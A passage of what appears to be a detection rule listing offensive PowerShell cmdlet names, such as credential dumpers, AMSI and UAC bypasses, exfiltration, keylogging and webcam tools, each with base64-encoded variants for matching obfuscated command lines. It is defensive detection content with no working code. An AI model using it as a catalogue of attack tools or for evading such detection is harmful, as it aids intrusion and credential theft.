'SQBuAHYAbwBrAGUALQBTAFMASABDAG8AbQBtAGEAbgBkA'\n - 'kAbgB2AG8AawBlAC0AUwBTAEgAQwBvAG0AbQBhAG4AZA'\n - 'JAG4AdgBvAGsAZQAtAFMAUwBIAEMAbwBtAG0AYQBuAGQA'\n # Invoke-SMBScanner\n - 'Invoke-SMBScanner'\n - 'SQBuAHYAbwBrAGUALQBTAE0AQgBTAGMAYQBuAG4AZQByA'\n - 'kAbgB2AG8AawBlAC0AUwBNAEIAUwBjAGEAbgBuAGUAcg'\n - 'JAG4AdgBvAGsAZQAtAFMATQBCAFMAYwBhAG4AbgBlAHIA'\n # Invoke-TimeStomp, from Apex\n - 'Invoke-TimeStomp'\n - 'SQBuAHYAbwBrAGUALQBUAGkAbQBlAFMAdABvAG0AcA'\n - 'kAbgB2AG8AawBlAC0AVABpAG0AZQBTAHQAbwBtAHAA'\n - 'JAG4AdgBvAGsAZQAtAFQAaQBtAGUAUwB0AG8AbQBwA'\n # Invoke-Creds, from Invoke-Apex\n - 'Invoke-Creds'\n - 'SQBuAHYAbwBrAGUALQBDAHIAZQBkAHMA'\n - 'kAbgB2AG8AawBlAC0AQwByAGUAZABzA'\n - 'JAG4AdgBvAGsAZQAtAEMAcgBlAGQAcw'\n # Invoke-UACBypass, from Matthew Graeber (@mattifestation) and Matt Nelson (@enigma0x3)\n - 'Invoke-UACBypass'\n - 'SQBuAHYAbwBrAGUALQBVAEEAQwBCAHkAcABhAHMAcw'\n - 'kAbgB2AG8AawBlAC0AVQBBAEMAQgB5AHAAYQBzAHMA'\n - 'JAG4AdgBvAGsAZQAtAFUAQQBDAEIAeQBwAGEAcwBzA'\n # Invoke-Exfil, from Invoke-Apex\n - 'Invoke-Exfil'\n - 'SQBuAHYAbwBrAGUALQBFAHgAZgBpAGwA'\n - 'kAbgB2AG8AawBlAC0ARQB4AGYAaQBsA'\n - 'JAG4AdgBvAGsAZQAtAEUAeABmAGkAbA'\n # Invoke-Persistence, from Invoke-Apex\n - 'Invoke-Persistence'\n - 'SQBuAHYAbwBrAGUALQBQAGUAcgBzAGkAcwB0AGUAbgBjAGUA'\n - 'kAbgB2AG8AawBlAC0AUABlAHIAcwBpAHMAdABlAG4AYwBlA'\n - 'JAG4AdgBvAGsAZQAtAFAAZQByAHMAaQBzAHQAZQBuAGMAZQ'\n # Invoke-Privesc, from Invoke-Privesc\n - 'Invoke-Privesc'\n - 'SQBuAHYAbwBrAGUALQBQAHIAaQB2AGUAcwBjA'\n - 'kAbgB2AG8AawBlAC0AUAByAGkAdgBlAHMAYw'\n - 'JAG4AdgBvAGsAZQAtAFAAcgBpAHYAZQBzAGMA'\n # Invoke-WMIMethod, from Microsoft :)\n - 'Invoke-WMIMethod'\n - 'SQBuAHYAbwBrAGUALQBXAE0ASQBNAGUAdABoAG8AZA'\n - 'kAbgB2AG8AawBlAC0AVwBNAEkATQBlAHQAaABvAGQA'\n - 'JAG4AdgBvAGsAZQAtAFcATQBJAE0AZQB0AGgAbwBkA'\n # timestomp\n - 'timestomp'\n - 'dABpAG0AZQBzAHQAbwBtAHAA'\n - 'QAaQBtAGUAcwB0AG8AbQBwA'\n - '0AGkAbQBlAHMAdABvAG0AcA'\n # PowerDump (both in PascalCase and lowercase)\n - 'PowerDump'\n - 'UABvAHcAZQByAEQAdQBtAHAA'\n - 'AAbwB3AGUAcgBEAHUAbQBwA'\n - 'QAG8AdwBlAHIARAB1AG0AcA'\n - 'cABvAHcAZQByAGQAdQBtAHAA'\n - 'AAbwB3AGUAcgBkAHUAbQBwA'\n - 'wAG8AdwBlAHIAZAB1AG0AcA'\n # Invoke-Obfuscation\n - 'Invoke-Obfuscation'\n - 'SQBuAHYAbwBrAGUALQBPAGIAZgB1AHMAYwBhAHQAaQBvAG4A'\n - 'kAbgB2AG8AawBlAC0ATwBiAGYAdQBzAGMAYQB0AGkAbwBuA'\n - 'JAG4AdgBvAGsAZQAtAE8AYgBmAHUAcwBjAGEAdABpAG8Abg'\n # Invoke-AmsiBypass\n - 'Invoke-AmsiBypass'\n - 'SQBuAHYAbwBrAGUALQBBAG0AcwBpAEIAeQBwAGEAcwBzA'\n - 'kAbgB2AG8AawBlAC0AQQBtAHMAaQBCAHkAcABhAHMAcw'\n - 'JAG4AdgBvAGsAZQAtAEEAbQBzAGkAQgB5AHAAYQBzAHMA'\n # Take-Screenshot, from Mr-Un1k0d3r\n - 'Take-Screenshot'\n - 'VABhAGsAZQAtAFMAYwByAGUAZQBuAHMAaABvAHQA'\n - 'QAYQBrAGUALQBTAGMAcgBlAGUAbgBzAGgAbwB0A'\n - 'UAGEAawBlAC0AUwBjAHIAZQBlAG4AcwBoAG8AdA'\n # Invoke-ADPasswordBruteForce, from Mr-Un1k0d3r\n - 'Invoke-ADPasswordBruteForce'\n - 'SQBuAHYAbwBrAGUALQBBAEQAUABhAHMAcwB3AG8AcgBkAEIAcgB1AHQAZQBGAG8AcgBjAGUA'\n - 'kAbgB2AG8AawBlAC0AQQBEAFAAYQBzAHMAdwBvAHIAZABCAHIAdQB0AGUARgBvAHIAYwBlA'\n - 'JAG4AdgBvAGsAZQAtAEEARABQAGEAcwBzAHcAbwByAGQAQgByAHUAdABlAEYAbwByAGMAZQ'\n # Remote-WmiExecute, from Mr-Un1k0d3r\n - 'Remote-WmiExecute'\n - 'UgBlAG0AbwB0AGUALQBXAG0AaQBFAHgAZQBjAHUAdABlA'\n - 'IAZQBtAG8AdABlAC0AVwBtAGkARQB4AGUAYwB1AHQAZQ'\n - 'SAGUAbQBvAHQAZQAtAFcAbQBpAEUAeABlAGMAdQB0AGUA'\n # Invoke-CradleCrafter, from danielbohannon\n - 'Invoke-CradleCrafter'\n - 'SQBuAHYAbwBrAGUALQBDAHIAYQBkAGwAZQBDAHIAYQBmAHQAZQByA'\n - 'kAbgB2AG8AawBlAC0AQwByAGEAZABsAGUAQwByAGEAZgB0AGUAcg'\n - 'JAG4AdgBvAGsAZQAtAEMAcgBhAGQAbABlAEMAcgBhAGYAdABlAHIA'\n # Remote-RegisterProtocolHandler, from Mr-Un1k0d3r\n - 'Remote-RegisterProtocolHandler'\n - 'UgBlAG0AbwB0AGUALQBSAGUAZwBpAHMAdABlAHIAUAByAG8AdABvAGMAbwBsAEgAYQBuAGQAbABlAHIA'\n - 'IAZQBtAG8AdABlAC0AUgBlAGcAaQBzAHQAZQByAFAAcgBvAHQAbwBjAG8AbABIAGEAbgBkAGwAZQByA'\n - 'SAGUAbQBvAHQAZQAtAFIAZQBnAGkAcwB0AGUAcgBQAHIAbwB0AG8AYwBvAGwASABhAG4AZABsAGUAcg'\n # Start-Eidolon, from FuzzySec\n - 'Start-Eidolon'\n - 'UwB0AGEAcgB0AC0ARQBpAGQAbwBsAG8Abg'\n - 'MAdABhAHIAdAAtAEUAaQBkAG8AbABvAG4A'\n - 'TAHQAYQByAHQALQBFAGkAZABvAGwAbwBuA'\n # Invoke-OutCradle, from danielbohannon\n - 'Invoke-OutCradle'\n - 'SQBuAHYAbwBrAGUALQBPAHUAdABDAHIAYQBkAGwAZQ'\n - 'kAbgB2AG8AawBlAC0ATwB1AHQAQwByAGEAZABsAGUA'\n - 'JAG4AdgBvAGsAZQAtAE8AdQB0AEMAcgBhAGQAbABlA'\n # Out-CradleContents, from danielbohannon\n - 'Out-CradleContents'\n - 'TwB1AHQALQBDAHIAYQBkAGwAZQBDAG8AbgB0AGUAbgB0AHMA'\n - '8AdQB0AC0AQwByAGEAZABsAGUAQwBvAG4AdABlAG4AdABzA'\n - 'TwB1AHQALQBDAHIAYQBkAGwAZQ'\n - '8AdQB0AC0AQwByAGEAZABsAGUA'\n - 'PAHUAdAAtAEMAcgBhAGQAbABlA'\n # Get-MicrophoneAudio, from Powersploit\n - 'Get-MicrophoneAudio'\n - 'RwBlAHQALQBNAGkAYwByAG8AcABoAG8AbgBlAEEAdQBkAGkAbw'\n - 'cAZQB0AC0ATQBpAGMAcgBvAHAAaABvAG4AZQBBAHUAZABpAG8A'\n - 'HAGUAdAAtAE0AaQBjAHIAbwBwAGgAbwBuAGUAQQB1AGQAaQBvA'\n # Wsuspendu, from ANSSI\n - 'Wsuspendu'\n - 'VwBzAHUAcwBwAGUAbgBkAHUA'\n - 'cAcwB1AHMAcABlAG4AZAB1A'\n - 'XAHMAdQBzAHAAZQBuAGQAdQ'\n # VolumeShadowCopyTools\n - 'VolumeShadowCopyTools'\n - 'Vm9sdW1lU2hhZG93Q29weVRvb2xz'\n - 'ZvbHVtZVNoYWRvd0NvcHlUb29sc'\n - 'Wb2x1bWVTaGFkb3dDb3B5VG9vbH'\n # Get-Unconstrained\n - 'Get-Unconstrained'\n - 'R2V0LVVuY29uc3RyYWluZW'\n - 'dldC1VbmNvbnN0cmFpbmVk'\n - 'HZXQtVW5jb25zdHJhaW5lZ'\n # Check-VM\n - 'Check-VM'\n - 'Q2hlY2stVk'\n - 'NoZWNrLVZN'\n - 'DaGVjay1WT'\n # Get-IndexedItem\n - 'Get-IndexedItem'\n - 'R2V0LUluZGV4ZWRJdGVt'\n - 'dldC1JbmRleGVkSXRlb'\n - 'HZXQtSW5kZXhlZEl0ZW'\n # Invoke-RunAs\n - 'Invoke-RunAs'\n - 'SW52b2tlLVJ1bkFz'\n - 'ludm9rZS1SdW5Bc'\n - 'JbnZva2UtUnVuQX'\n # MailRaider\n - 'MailRaider'\n - 'TWFpbFJhaWRlc'\n - '1haWxSYWlkZX'\n - 'NYWlsUmFpZGVy'\n # Invoke-ThunderStruck\n - 'Invoke-ThunderStruck'\n - 'SW52b2tlLVRodW5kZXJTdHJ1Y2'\n - 'ludm9rZS1UaHVuZGVyU3RydWNr'\n - 'JbnZva2UtVGh1bmRlclN0cnVja'\n # Invoke-VoiceTroll\n - 'Invoke-VoiceTroll'\n - 'SW52b2tlLVZvaWNlVHJvbG'\n - 'ludm9rZS1Wb2ljZVRyb2xs'\n - 'JbnZva2UtVm9pY2VUcm9sb'\n # Get-SecurityPackages\n - 'Get-SecurityPackages'\n - 'R2V0LVNlY3VyaXR5UGFja2FnZX'\n - 'dldC1TZWN1cml0eVBhY2thZ2Vz'\n - 'HZXQtU2VjdXJpdHlQYWNrYWdlc'\n # Get-RickAstley\n - 'Get-RickAstley'\n - 'R2V0LVJpY2tBc3RsZX'\n - 'dldC1SaWNrQXN0bGV5'\n - 'HZXQtUmlja0FzdGxle'\n # Find-Fruit\n - 'Find-Fruit'\n - 'RmluZC1GcnVpd'\n - 'ZpbmQtRnJ1aX'\n - 'GaW5kLUZydWl0'\n # HTTP-Login\n - 'HTTP-Login'\n - 'SFRUUC1Mb2dpb'\n - 'hUVFAtTG9naW'\n - 'IVFRQLUxvZ2lu'\n # Find-TrustedDocuments\n - 'Find-TrustedDocuments'\n - 'RmluZC1UcnVzdGVkRG9jdW1lbnRz'\n - 'ZpbmQtVHJ1c3RlZERvY3VtZW50c'\n - 'GaW5kLVRydXN0ZWREb2N1bWVudH'\n # Invoke-BadPotato\n - 'Invoke-BadPotato'\n - 'SW52b2tlLUJhZFBvdGF0b'\n - 'ludm9rZS1CYWRQb3RhdG'\n - 'JbnZva2UtQmFkUG90YXRv'\n # Invoke-BetterSafetyKatz\n - 'Invoke-BetterSafetyKatz'\n - 'SW52b2tlLUJldHRlclNhZmV0eUthdH'\n - 'ludm9rZS1CZXR0ZXJTYWZldHlLYXR6'\n - 'JbnZva2UtQmV0dGVyU2FmZXR5S2F0e'\n # Invoke-Carbuncle\n - 'Invoke-Carbuncle'\n - 'SW52b2tlLUNhcmJ1bmNsZ'\n - 'ludm9rZS1DYXJidW5jbG'\n - 'JbnZva2UtQ2FyYnVuY2xl'\n # Invoke-Certify\n - 'Invoke-Certify'\n - 'SW52b2tlLUNlcnRpZn'\n - 'ludm9rZS1DZXJ0aWZ5'\n - 'JbnZva2UtQ2VydGlme'\n # Invoke-DAFT\n - 'Invoke-DAFT'\n - 'SW52b2tlLURBRl'\n - 'ludm9rZS1EQUZU'\n - 'JbnZva2UtREFGV'\n # Invoke-DinvokeKatz\n - 'Invoke-DinvokeKatz'\n - 'SW52b2tlLURpbnZva2VLYXR6'\n - 'ludm9rZS1EaW52b2tlS2F0e'\n - 'JbnZva2UtRGludm9rZUthdH'\n # Invoke-Eyewitness\n - 'Invoke-Eyewitness'\n - 'SW52b2tlLUV5ZXdpdG5lc3'\n - 'ludm9rZS1FeWV3aXRuZXNz'\n - 'JbnZva2UtRXlld2l0bmVzc'\n # Invoke-FakeLogonScreen\n - 'Invoke-FakeLogonScreen'\n - 'SW52b2tlLUZha2VMb2dvblNjcmVlb'\n - 'ludm9rZS1GYWtlTG9nb25TY3JlZW'\n - 'JbnZva2UtRmFrZUxvZ29uU2NyZWVu'\n # Invoke-Farmer\n - 'Invoke-Farmer'\n - 'SW52b2tlLUZhcm1lc'\n - 'ludm9rZS1GYXJtZX'\n - 'JbnZva2UtRmFybWVy'\n # Invoke-Get-RBCD-Threaded\n - 'Invoke-Get-RBCD-Threaded'\n - 'SW52b2tlLUdldC1SQkNELVRocmVhZGVk'\n - 'ludm9rZS1HZXQtUkJDRC1UaHJlYWRlZ'\n - 'JbnZva2UtR2V0LVJCQ0QtVGhyZWFkZW'\n # Invoke-Gopher\n - 'Invoke-Gopher'\n - 'SW52b2tlLUdvcGhlc'\n - 'ludm9rZS1Hb3BoZX'\n - 'JbnZva2UtR29waGVy'\n # Invoke-Grouper\n - 'Invoke-Grouper'\n - 'SW52b2tlLUdyb3VwZX'\n - 'ludm9rZS1Hcm91cGVy'\n - 'JbnZva2UtR3JvdXBlc'\n # Invoke-HandleKatz\n - 'Invoke-HandleKatz'\n - 'SW52b2tlLUhhbmRsZUthdH'\n - 'ludm9rZS1IYW5kbGVLYXR6'\n - 'JbnZva2UtSGFuZGxlS2F0e'\n # Invoke-Internalmonologue\n - 'Invoke-Internalmonologue'\n - 'SW52b2tlLUludGVybmFsbW9ub2xvZ3Vl'\n - 'ludm9rZS1JbnRlcm5hbG1vbm9sb2d1Z'\n - 'JbnZva2UtSW50ZXJuYWxtb25vbG9ndW'\n # Invoke-KrbRelay\n - 'Invoke-KrbRelay'\n - 'SW52b2tlLUtyYlJlbGF5'\n - 'ludm9rZS1LcmJSZWxhe'\n - 'JbnZva2UtS3JiUmVsYX'\n # Invoke-LdapSignCheck\n - 'Invoke-LdapSignCheck'\n - 'SW52b2tlLUxkYXBTaWduQ2hlY2'\n - 'ludm9rZS1MZGFwU2lnbkNoZWNr'\n - 'JbnZva2UtTGRhcFNpZ25DaGVja'\n # Invoke-Lockless\n - 'Invoke-Lockless'\n - 'SW52b2tlLUxvY2tsZXNz'\n - 'ludm9rZS1Mb2NrbGVzc'\n - 'JbnZva2UtTG9ja2xlc3'\n # Invoke-MITM6\n - 'Invoke-MITM6'\n - 'SW52b2tlLU1JVE02'\n - 'ludm9rZS1NSVRNN'\n - 'JbnZva2UtTUlUTT'\n # Invoke-MalSCCM\n - 'Invoke-MalSCCM'\n - 'SW52b2tlLU1hbFNDQ0'\n - 'ludm9rZS1NYWxTQ0NN'\n - 'JbnZva2UtTWFsU0NDT'\n # Invoke-NanoDump\n - 'Invoke-NanoDump'\n - 'SW52b2tlLU5hbm9EdW1w'\n - 'ludm9rZS1OYW5vRHVtc'\n - 'JbnZva2UtTmFub0R1bX'\n # Invoke-OxidResolver\n - 'Invoke-OxidResolver'\n - 'SW52b2tlLU94aWRSZXNvbHZlc'\n - 'ludm9rZS1PeGlkUmVzb2x2ZX'\n - 'JbnZva2UtT3hpZFJlc29sdmVy'\n # Invoke-P0wnedshell\n - 'Invoke-P0wnedshell'\n - 'SW52b2tlLVAwd25lZHNoZWxs'\n - 'ludm9rZS1QMHduZWRzaGVsb'\n - 'JbnZva2UtUDB3bmVkc2hlbG'\n # Invoke-PPLDump\n - 'Invoke-PPLDump'\n - 'SW52b2tlLVBQTER1bX'\n - 'ludm9rZS1QUExEdW1w'\n - 'JbnZva2UtUFBMRHVtc'\n # Invoke-Rubeus\n - 'Invoke-Rubeus'\n - 'SW52b2tlLVJ1YmV1c'\n - 'ludm9rZS1SdWJldX'\n - 'JbnZva2UtUnViZXVz'\n # Invoke-SCShell\n - 'Invoke-SCShell'\n - 'SW52b2tlLVNDU2hlbG'\n - 'ludm9rZS1TQ1NoZWxs'\n - 'JbnZva2UtU0NTaGVsb'\n # Invoke-SafetyKatz\n - 'Invoke-SafetyKatz'\n - 'SW52b2tlLVNhZmV0eUthdH'\n - 'ludm9rZS1TYWZldHlLYXR6'\n - 'JbnZva2UtU2FmZXR5S2F0e'\n # Invoke-SauronEye\n - 'Invoke-SauronEye'\n - 'SW52b2tlLVNhdXJvbkV5Z'\n - 'ludm9rZS1TYXVyb25FeW'\n - 'JbnZva2UtU2F1cm9uRXll'\n # Invoke-Seatbelt\n - 'Invoke-Seatbelt'\n - 'SW52b2tlLVNlYXRiZWx0'\n - 'ludm9rZS1TZWF0YmVsd'\n - 'JbnZva2UtU2VhdGJlbH'\n # Invoke-ShadowSpray\n - 'Invoke-ShadowSpray'\n - 'SW52b2tlLVNoYWRvd1NwcmF5'\n - 'ludm9rZS1TaGFkb3dTcHJhe'\n - 'JbnZva2UtU2hhZG93U3ByYX'\n # Invoke-SharPersist\n - 'Invoke-SharPersist'\n - 'SW52b2tlLVNoYXJQZXJzaXN0'\n - 'ludm9rZS1TaGFyUGVyc2lzd'\n - 'JbnZva2UtU2hhclBlcnNpc3'\n # Invoke-SharpAllowedToAct\n - 'Invoke-SharpAllowedToAct'\n - 'SW52b2tlLVNoYXJwQWxsb3dlZFRvQWN0'\n - 'ludm9rZS1TaGFycEFsbG93ZWRUb0Fjd'\n - 'JbnZva2UtU2hhcnBBbGxvd2VkVG9BY3'\n # Invoke-SharpBlock\n - 'Invoke-SharpBlock'\n - 'SW52b2tlLVNoYXJwQmxvY2'\n - 'ludm9rZS1TaGFycEJsb2Nr'\n - 'JbnZva2UtU2hhcnBCbG9ja'\n # Invoke-SharpBypassUAC\n - 'Invoke-SharpBypassUAC'\n - 'SW52b2tlLVNoYXJwQnlwYXNzVUFD'\n - 'ludm9rZS1TaGFycEJ5cGFzc1VBQ'\n - 'JbnZva2UtU2hhcnBCeXBhc3NVQU'\n # Invoke-SharpChromium\n - 'Invoke-SharpChromium'\n - 'SW52b2tlLVNoYXJwQ2hyb21pdW'\n - 'ludm9rZS1TaGFycENocm9taXVt'\n - 'JbnZva2UtU2hhcnBDaHJvbWl1b'\n # Invoke-SharpClipboard\n - 'Invoke-SharpClipboard'\n - 'SW52b2tlLVNoYXJwQ2xpcGJvYXJk'\n - 'ludm9rZS1TaGFycENsaXBib2FyZ'\n - 'JbnZva2UtU2hhcnBDbGlwYm9hcm'\n # Invoke-SharpCloud\n - 'Invoke-SharpCloud'\n - 'SW52b2tlLVNoYXJwQ2xvdW'\n - 'ludm9rZS1TaGFycENsb3Vk'\n - 'JbnZva2UtU2hhcnBDbG91Z'\n # Invoke-SharpDPAPI\n - 'Invoke-SharpDPAPI'\n - 'SW52b2tlLVNoYXJwRFBBUE'\n - 'ludm9rZS1TaGFycERQQVBJ'\n - 'JbnZva2UtU2hhcnBEUEFQS'\n # Invoke-SharpDump\n - 'Invoke-SharpDump'\n - 'SW52b2tlLVNoYXJwRHVtc'\n - 'ludm9rZS1TaGFycER1bX'\n - 'JbnZva2UtU2hhcnBEdW1w'\n # Invoke-SharpGPO-RemoteAccessPolicies\n - 'Invoke-SharpGPO-RemoteAccessPolicies'\n - 'SW52b2tlLVNoYXJwR1BPLVJlbW90ZUFjY2Vzc1BvbGljaWVz'\n - 'ludm9rZS1TaGFycEdQTy1SZW1vdGVBY2Nlc3NQb2xpY2llc'\n - 'JbnZva2UtU2hhcnBHUE8tUmVtb3RlQWNjZXNzUG9saWNpZX'\n # Invoke-SharpGPOAbuse\n - 'Invoke-SharpGPOAbuse'\n - 'SW52b2tlLVNoYXJwR1BPQWJ1c2'\n - 'ludm9rZS1TaGFycEdQT0FidXNl'\n - 'JbnZva2UtU2hhcnBHUE9BYnVzZ'\n # Invoke-SharpHandler\n - 'Invoke-SharpHandler'\n - 'SW52b2tlLVNoYXJwSGFuZGxlc'\n - 'ludm9rZS1TaGFycEhhbmRsZX'\n - 'JbnZva2UtU2hhcnBIYW5kbGVy'\n # Invoke-SharpHide\n - 'Invoke-SharpHide'\n - 'SW52b2tlLVNoYXJwSGlkZ'\n - 'ludm9rZS1TaGFycEhpZG'\n - 'JbnZva2UtU2hhcnBIaWRl'\n # Invoke-SharpImpersonation\n - 'Invoke-SharpImpersonation'\n - 'SW52b2tlLVNoYXJwSW1wZXJzb25hdGlvb'\n - 'ludm9rZS1TaGFycEltcGVyc29uYXRpb2'\n - 'JbnZva2UtU2hhcnBJbXBlcnNvbmF0aW9u'\n # Invoke-SharpImpersonationNoSpace\n - 'Invoke-SharpImpersonationNoSpace'\n - 'SW52b2tlLVNoYXJwSW1wZXJzb25hdGlvbk5vU3BhY2'\n - 'ludm9rZS1TaGFycEltcGVyc29uYXRpb25Ob1NwYWNl'\n - 'JbnZva2UtU2hhcnBJbXBlcnNvbmF0aW9uTm9TcGFjZ'\n # Invoke-SharpKatz\n - 'Invoke-SharpKatz'\n - 'SW52b2tlLVNoYXJwS2F0e'\n - 'ludm9rZS1TaGFycEthdH'\n - 'JbnZva2UtU2hhcnBLYXR6'\n # Invoke-SharpLdapRelayScan\n - 'Invoke-SharpLdapRelayScan'\n - 'SW52b2tlLVNoYXJwTGRhcFJlbGF5U2Nhb'\n - 'ludm9rZS1TaGFycExkYXBSZWxheVNjYW'\n - 'JbnZva2UtU2hhcnBMZGFwUmVsYXlTY2Fu'\n # Invoke-SharpLoginPrompt\n - 'Invoke-SharpLoginPrompt'\n - 'SW52b2tlLVNoYXJwTG9naW5Qcm9tcH'\n - 'ludm9rZS1TaGFycExvZ2luUHJvbXB0'\n - 'JbnZva2UtU2hhcnBMb2dpblByb21wd'\n # Invoke-SharpMove\n - 'Invoke-SharpMove'\n - 'SW52b2tlLVNoYXJwTW92Z'\n - 'ludm9rZS1TaGFycE1vdm'\n - 'JbnZva2UtU2hhcnBNb3Zl'\n # Invoke-SharpPrintNightmare\n - 'Invoke-SharpPrintNightmare'\n - 'SW52b2tlLVNoYXJwUHJpbnROaWdodG1hcm'\n - 'ludm9rZS1TaGFycFByaW50TmlnaHRtYXJl'\n - 'JbnZva2UtU2hhcnBQcmludE5pZ2h0bWFyZ'\n # Invoke-SharpPrinter\n - 'Invoke-SharpPrinter'\n - 'SW52b2tlLVNoYXJwUHJpbnRlc'\n - 'ludm9rZS1TaGFycFByaW50ZX'\n - 'JbnZva2UtU2hhcnBQcmludGVy'\n # Invoke-SharpRDP\n - 'Invoke-SharpRDP'\n - 'SW52b2tlLVNoYXJwUkRQ'\n - 'ludm9rZS1TaGFycFJEU'\n - 'JbnZva2UtU2hhcnBSRF'\n # Invoke-SharpSCCM\n - 'Invoke-SharpSCCM'\n - 'SW52b2tlLVNoYXJwU0NDT'\n - 'ludm9rZS1TaGFycFNDQ0'\n - 'JbnZva2UtU2hhcnBTQ0NN'\n # Invoke-SharpSSDP\n - 'Invoke-SharpSSDP'\n - 'SW52b2tlLVNoYXJwU1NEU'\n - 'ludm9rZS1TaGFycFNTRF'\n - 'JbnZva2UtU2hhcnBTU0RQ'\n # Invoke-SharpSecDump\n - 'Invoke-SharpSecDump'\n - 'SW52b2tlLVNoYXJwU2VjRHVtc'\n - 'ludm9rZS1TaGFycFNlY0R1bX'\n - 'JbnZva2UtU2hhcnBTZWNEdW1w'\n # Invoke-SharpSniper\n - 'Invoke-SharpSniper'\n - 'SW52b2tlLVNoYXJwU25pcGVy'\n - 'ludm9rZS1TaGFycFNuaXBlc'\n - 'JbnZva2UtU2hhcnBTbmlwZX'\n # Invoke-SharpSploit\n - 'Invoke-SharpSploit'\n - 'SW52b2tlLVNoYXJwU3Bsb2l0'\n - 'ludm9rZS1TaGFycFNwbG9pd'\n - 'JbnZva2UtU2hhcnBTcGxvaX'\n # Invoke-SharpSpray\n - 'Invoke-SharpSpray'\n - 'SW52b2tlLVNoYXJwU3ByYX'\n - 'ludm9rZS1TaGFycFNwcmF5'\n - 'JbnZva2UtU2hhcnBTcHJhe'\n # Invoke-SharpStay\n - 'Invoke-SharpStay'\n - 'SW52b2tlLVNoYXJwU3Rhe'\n - 'ludm9rZS1TaGFycFN0YX'\n - 'JbnZva2UtU2hhcnBTdGF5'\n # Invoke-SharpUp\n - 'Invoke-SharpUp'\n - 'SW52b2tlLVNoYXJwVX'\n - 'ludm9rZS1TaGFycFVw'\n - 'JbnZva2UtU2hhcnBVc'\n # Invoke-SharpWSUS\n - 'Invoke-SharpWSUS'\n - 'SW52b2tlLVNoYXJwV1NVU'\n - 'ludm9rZS1TaGFycFdTVV'\n - 'JbnZva2UtU2hhcnBXU1VT'\n # Invoke-SharpWatson\n - 'Invoke-SharpWatson'\n - 'SW52b2tlLVNoYXJwV2F0c29u'\n - 'ludm9rZS1TaGFycFdhdHNvb'\n - 'JbnZva2UtU2hhcnBXYXRzb2'\n # Invoke-Sharphound\n - 'Invoke-Sharphound'\n - 'SW52b2tlLVNoYXJwaG91bm'\n - 'ludm9rZS1TaGFycGhvdW5k'\n - 'JbnZva2UtU2hhcnBob3VuZ'\n # Invoke-Sharplocker\n - 'Invoke-Sharplocker'\n - 'SW52b2tlLVNoYXJwbG9ja2Vy'\n - 'ludm9rZS1TaGFycGxvY2tlc'\n - 'JbnZva2UtU2hhcnBsb2NrZX'\n # Invoke-Sharpshares\n - 'Invoke-Sharpshares'\n - 'SW52b2tlLVNoYXJwc2hhcmVz'\n - 'ludm9rZS1TaGFycHNoYXJlc'\n - 'JbnZva2UtU2hhcnBzaGFyZX'\n # Invoke-Sharpview\n - 'Invoke-Sharpview'\n - 'SW52b2tlLVNoYXJwdmlld'\n - 'ludm9rZS1TaGFycHZpZX'\n - 'JbnZva2UtU2hhcnB2aWV3'\n # Invoke-Sharpweb\n - 'Invoke-Sharpweb'\n - 'SW52b2tlLVNoYXJwd2Vi'\n - 'ludm9rZS1TaGFycHdlY'\n - 'JbnZva2UtU2hhcnB3ZW'\n # Invoke-Snaffler\n - 'Invoke-Snaffler'\n - 'SW52b2tlLVNuYWZmbGVy'\n - 'ludm9rZS1TbmFmZmxlc'\n - 'JbnZva2UtU25hZmZsZX'\n # Invoke-Spoolsample\n - 'Invoke-Spoolsample'\n - 'SW52b2tlLVNwb29sc2FtcGxl'\n - 'ludm9rZS1TcG9vbHNhbXBsZ'\n - 'JbnZva2UtU3Bvb2xzYW1wbG'\n # Invoke-StandIn\n - 'Invoke-StandIn'\n - 'SW52b2tlLVN0YW5kSW'\n - 'ludm9rZS1TdGFuZElu'\n - 'JbnZva2UtU3RhbmRJb'\n # Invoke-StickyNotesExtract\n - 'Invoke-StickyNotesExtract'\n - 'SW52b2tlLVN0aWNreU5vdGVzRXh0cmFjd'\n - 'ludm9rZS1TdGlja3lOb3Rlc0V4dHJhY3'\n - 'JbnZva2UtU3RpY2t5Tm90ZXNFeHRyYWN0'\n # Invoke-TotalExec\n - 'Invoke-TotalExec'\n - 'SW52b2tlLVRvdGFsRXhlY'\n - 'ludm9rZS1Ub3RhbEV4ZW'\n - 'JbnZva2UtVG90YWxFeGVj'\n # Invoke-Thunderfox\n - 'Invoke-Thunderfox'\n - 'SW52b2tlLVRodW5kZXJmb3'\n - 'ludm9rZS1UaHVuZGVyZm94'\n - 'JbnZva2UtVGh1bmRlcmZve'\n # Invoke-Tokenvator\n - 'Invoke-Tokenvator'\n - 'SW52b2tlLVRva2VudmF0b3'\n - 'ludm9rZS1Ub2tlbnZhdG9y'\n - 'JbnZva2UtVG9rZW52YXRvc'\n # Invoke-UrbanBishop\n - 'Invoke-UrbanBishop'\n - 'SW52b2tlLVVyYmFuQmlzaG9w'\n - 'ludm9rZS1VcmJhbkJpc2hvc'\n - 'JbnZva2UtVXJiYW5CaXNob3'\n # Invoke-Whisker\n - 'Invoke-Whisker'\n - 'SW52b2tlLVdoaXNrZX'\n - 'ludm9rZS1XaGlza2Vy'\n - 'JbnZva2UtV2hpc2tlc'\n # Invoke-WireTap\n - 'Invoke-WireTap'\n - 'SW52b2tlLVdpcmVUYX'\n - 'ludm9rZS1XaXJlVGFw'\n - 'JbnZva2UtV2lyZVRhc'\n # Invoke-winPEAS\n - 'Invoke-winPEAS'\n - 'SW52b2tlLXdpblBFQV'\n - 'ludm9rZS13aW5QRUFT'\n - 'JbnZva2Utd2luUEVBU'\n # Invoke-Zerologon\n - 'Invoke-Zerologon'\n - 'SW52b2tlLVplcm9sb2dvb'\n - 'ludm9rZS1aZXJvbG9nb2'\n - 'JbnZva2UtWmVyb2xvZ29u'\n # Get-USBKeystrokes\n - 'Get-USBKeystrokes'\n - 'R2V0LVVTQktleXN0cm9rZX'\n - 'dldC1VU0JLZXlzdHJva2Vz'\n - 'HZXQtVVNCS2V5c3Ryb2tlc'\n # Start-WebcamRecorder\n - 'Start-WebcamRecorder'\n - 'U3RhcnQtV2ViY2FtUmVjb3JkZX'\n - 'N0YXJ0LVdlYmNhbVJlY29yZGVy'\n - 'TdGFydC1XZWJjYW1SZWNvcmRlc'\n # Invoke-OfficeScrape\n - 'Invoke-OfficeScrape'\n - 'SW52b2tlLU9mZmljZVNjcmFwZ'\n - 'ludm9rZS1PZmZpY2VTY3JhcG'\n - 'JbnZva2UtT2ZmaWNlU2NyYXBl'\n # Invoke-DomainPasswordSpray\n - 'Invoke-DomainPasswordSpray'\n - 'SW52b2tlLURvbWFpblBhc3N3b3JkU3ByYX'\n - 'ludm9rZS1Eb21haW5QYXNzd29yZFNwcmF5'\n - 